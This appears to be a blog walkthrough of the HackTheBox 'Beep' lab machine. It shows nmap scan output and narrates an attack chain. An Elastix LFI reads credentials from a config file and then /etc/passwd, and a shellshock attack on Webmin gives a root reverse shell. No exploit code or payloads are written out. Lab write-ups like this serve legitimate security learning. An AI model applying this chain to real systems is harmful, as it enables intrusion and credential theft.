driggzzzz

HackTheBox – Beep

I started by adding beeps IP address 10.10.10.7 to /etc/hosts as beep.htb

I ran a fast nmap scan of the top 1000 ports followed by a fast scan of all ports

I then ran a thorough scan of all of the open ports, this gave me the impression that this a a few possible attack vectors.

# Nmap 7.80 scan initiated Fri Apr 24 12:15:20 2020 as: nmap -A -p22,25,80,110,111,143,443,878,993,995,3306,4190,4445,5038,10000 -oN nmap-full.txt beep.htb
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.018s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://beep.htb/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: EXPIRE(NEVER) STLS USER APOP LOGIN-DELAY(0) PIPELINING TOP RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE UIDL
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: IDLE CHILDREN Completed QUOTA URLAUTHA0001 RIGHTS=kxte THREAD=REFERENCES ACL IMAP4 LIST-SUBSCRIBED MULTIAPPEND X-NETSCAPE OK THREAD=ORDEREDSUBJECT NO LITERAL+ CATENATE UNSELECT SORT ID RENAME LISTEXT SORT=MODSEQ BINARY ANNOTATEMORE NAMESPACE STARTTLS ATOMIC IMAP4rev1 CONDSTORE MAILBOX-REFERRALS UIDPLUS
443/tcp   open  ssl/https?
|_ssl-date: 2020-04-24T10:21:45+00:00; -56m52s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|media device|PBX|WAP|specialized|printer|proxy server
Running (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys embedded (94%), Riverbed RiOS (94%), HP embedded (94%), Osmosys embedded (93%), WebSense embedded (93%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:linux:linux_kernel:2.6.27 cpe:/o:linux:linux_kernel:2.4.32 cpe:/h:linksys:wrv54g cpe:/o:riverbed:rios cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.18 (95%), Linux 2.6.9 - 2.6.24 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.27 (likely embedded) (95%), Linux 2.6.20-1 (Fedora Core 5) (95%), Linux 2.6.27 (95%), Linux 2.6.30 (95%), Linux 2.6.5 - 2.6.12 (95%), Linux 2.6.5-7.283-smp (SuSE Enterprise Server 9, x86) (95%), Linux 2.6.8 (Debian 3.1) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: -56m52s

TRACEROUTE (using port 143/tcp)
HOP RTT      ADDRESS
1   17.61 ms 10.10.14.1
2   18.77 ms beep.htb (10.10.10.7)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 24 12:21:12 2020 -- 1 IP address (1 host up) scanned in 352.49 seconds

I decided to take a look at what was running on port 80 where I was presented with a login panel for elastix.

Searching for exploits for this yielded several results. After taking a look at these I eventually settled on an LFI exploit.

Visiting this directory on the web server presented me with a config file, where there appeared to be Admin credentials stored, I simply used ctrl+f to search for “pass”.

I used these credentials to successfully authenticate against elastix.

Now that I am authenticated I will try to run the LFI again, this time against different directories, I started with /etc/passwd to get an idea of users on the system – fanis looks a good candidate.

I used this knowledge to grab the user flag by traversing to /home/fanis/user.txt

After enumerating this service further I didn’t find anything helpful. I also unsuccessfully attempted to log in to the MySQL Database using these credentials due to my machine not having the appropriate permissions to access it. I decided to check out port 10000 which was running webmin.
I noticed upon attempting to login in it used cgi.

This could potentially be vulnerable to a shellshock attack, I used this to successfully spawn a reverse shell as the root user.

There is however a much easier way to root; using the credentials from the LFI exploit to log in via SSH…

%d bloggers like this:
search previous next tag category expand menu location phone mail time cart zoom edit close